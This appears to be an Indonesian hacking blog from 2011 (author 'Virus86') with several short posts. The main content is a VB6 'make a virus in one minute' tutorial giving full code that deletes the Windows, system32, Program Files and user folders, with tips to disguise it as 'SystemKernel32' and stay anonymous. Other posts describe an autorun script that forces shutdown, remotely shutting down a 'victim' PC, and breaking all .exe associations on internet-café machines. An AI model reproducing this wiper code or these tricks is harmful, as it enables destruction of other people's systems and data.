Email dan password fb anda nantinya Akan Berguna Ketika Kita Mendapatkan satu pesan untuk kode konfirmasi yang biasanya berbunyi apakah anda yakin mengnonaktifkannya,,

good luck..Semoga berhasil

By : Virus86

Rabu, 19 Januari 2011

Perfect Utilities adalah software utilities yang berfungsi untuk mengatasi masalah yang terdapat dikomputer anda. Tampilannya memang mirip dengan TuneUp. Hal tersebut ditujukan agar kita dapat menggunakannya secara mudah.

Perfect utilities ini menyediakan 20 tools untuk mengoptimalkan komputer Windows anda. Software ini pun mendukung berbagai sistem operasi seperti Windows 95 sampai Windows 7.

Kinerjanyanya pun lumayan bagus, dan dapat mengatasi masalah komputer mulai dari masalah komputer sangat lamban sampai masalah blue screen.

Software utilities kali ini memang sedikit berbeda dari yang lainnya, dikarenakan Perfect Utilities ini dibuat oleh seorang programer yang berasal dari daerah Cina.

Perfect Utilities ini dikelompokan menjadi beberapa kategori yaitu :
- System Cleaners
- System Optimizers
- System Control
- System Tools
- Registry Tools
- File Tools

dapatkan Aplikasi Ini Secara Gratis Di Sini
Salam Virus86

Source: http://islam-download.net/software-free-gratis-terbaru/desktop/perfect-utilities.html#ixzz1BYacnSim

Selasa, 11 Januari 2011

Postingan Ini saya Kutip dari salah Seorang PRogRamer Hebat http://inside-and.blogspot.com

Cara Ini akan otomatis Meminta Password Ketika Flasdish Kita Masukan..da Jika PAssword salah maka Komputer akan shutDown secara Otomatis..
Oke langsung Aja..

1.Buka Notepad...Bagi Yang BElum Terlalu Tahu Cara Buka NotePad ini Adalah cara LEngkapnya Klik start>>All Program>>accesories>>Notepad Atau Cara singkatnya PAda Menu Run Ketikan Notepad
2.Kemudian copykan Script Di bawah Ini Pada Notepad..

on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject("Wscript.shell")
set fs=createobject("Scripting.FileSystemObject")
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject("wscript.shell")
do while quest=""
quest=inputbox("Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!","http://pedasmaniscinta.blogspot.com")
if quest="" then
m=MsgBox("Maaf anda belum memasukkan password...!", 0+0+48, "http://pedasmaniscinta.blogspot.com")
end if
loop
if quest="TULIS PASSWORD DISINI" then
s.run "shutdown -a"
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
else
s.run "shutdown -s -t 0"
end if


TULIS PASSWORD DISINI ganti sesuai keinginan anda, itu adalah sebagai tempat password anda. Pemakaian huruf kapital sangat berpengaruh. saya sarankan memakai angka yang sudah diingat di luar kepala.
lalu save as dengan nama “passwordlock.vbs” tanpa tanda kutip, sebelum di save as pastikan pilih all files.

3. setelah selesai diatas.
lalu buka Notepad lagi, untuk pengaturan otomatis setelah flashdisk dimasukan di PC.
copy paste script kode dibawah ini ke notepad.

[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=FLASHDISK TELAH DIPASANG PASSWORD

anda dapat merubah kata “FLASHDISK TELAH DIPASANG PASSWORD” sesuai kata-kata mutiara keinginan anda sendiri.
setelah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah “autorun.inf” tanpa tanda kutip, sebelum di save as pastikan pilih all files.

Kemudian pindahkan kedua file yang telah anda buat tadi (autorun.inf dan passwordlock.vbs) ke dalam flashdisk anda.

langkah terakhir silahkan anda hidden autorun.inf dan passwordlock.vbs yang telah dibuat tadi.
Cara hidden : klik kanan pada masing- masing autorun.inf dan passwordlock.vbs lalu pilih properties centang kotak yang ada di tanda hidden.

Sumber :pedasmaniscinta

Salam virus86

Jumat, 07 Januari 2011

Di dipostingan terdahulu saya Menulis Bagaimana Menonaktifkan aplikasi KOmputer tanpa aplikasi..sekarang Fungsi yang sama..Tapi Ini Mengunakan Aplikasi..Jadi Tidak harus Repot-Repot masuk Ke command Prompt..
Tinggal Instal Aplikasi Langsung Jalan..
aplikasinya Bisa Didapatkan Disini

Berikut cara menggunakannya :

1. Setelah anda menginstal softwarenya, jalankan program Applocker,
Beri check/contreng pada nama aplikasi yang akan di-nonaktifkan , kemudian klik Save >> Close.


2. Coba anda jalankan aplikasi yang tadi dicheklist, maka akan ada peringatan seperti ini :

3. Jika ada program yang tidak terdaftar pada daftar, maka anda bisa menambahnya secara manual. Klik Configure , pada kolom Caption isi dengan nama program (namanya bebas) yang akan anda non-aktifkan, pada kolom executable file name isi dengan nama file *.exe program tersebut >>Klik Add >> Klik OK.


4. Untuk mengembalikan aplikasi yang anda non-aktifkan tadi, pilih uncheck pada nama aplikasi.
Selamat Mencoba.

Salam Virus-86

Baiklah saya Akan Memberikan Satu Cara Yang cukup Membingungkan Orang lain,,karena Komputernya mati Mendadak....
Cara Iseng Ini di posting Bukan Untuk jahil Kepada Teman atau di warnet,,
SEMATA-MATA hanya Ilmu..OKe...Tanpa BABIBU lagi ...mari,,
1.Masuk ke menu RUN atau Tekan Icon Windows+R
2.setelah masuk Ke Menu Run Ketikan Pada Kotak "CMD"..(tanpa Pakai tanda Kutip)
3.Kemudian Mulai Beraksi..Ketik Shutdown -i
4.SEtelah Itu Akan Muncul Sebuah Box yang harus Di isi,.Terutama Untuk IP address atau nama Komputer Korban..Kemudian Klik OK..
SElamat MEncoba.....

salam Virus-86

Selasa, 04 Januari 2011

Aku buat nih tutorial untuk bikin virus yg rada mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus manapun,soalnya cara kerjanya simple bgt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.
Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system,
Lumayan bahaya…KaNnn
ini cman contoh bikin virus… slanjutnya.. anda silahkan coba2 sendiri

Salam Virus-86

Senin, 03 Januari 2011

Buat Para Pecinta Virus-86 yang ingin Ngerjain Komputer orang atau warnet,,Gue punya 1 trik yang bisa dbilang mudah tapi membahayakan(Bagi yang Awam..Hehehehe)KHUSUS WINDOWS..Caranya..


1.Kita masuk ke menu Run Atau logo window + R
2.Kemudian Tuliskan cmd atau command
3.ketikkan assoc.exe=virus86
4.lihat perubahanya

Semua Aplikasi yang terinstall di dalam komputer itu sudah tidak bisa di buka
Hebat Bukan..???

Trusss.......Cara Ngembaliinya...????
Gampang..

1.Tinggal masuk ke Menu run Tadi..
2.Kemudian ketikkan command karena cmd sudah tidak berfungsi lagi
3.ketikan assoc.exe=exefile
4.maka semua aplikasi akan pulih seperti semula

Salam Virus Blogger
Subscribe to RSS Feed Follow me on Twitter!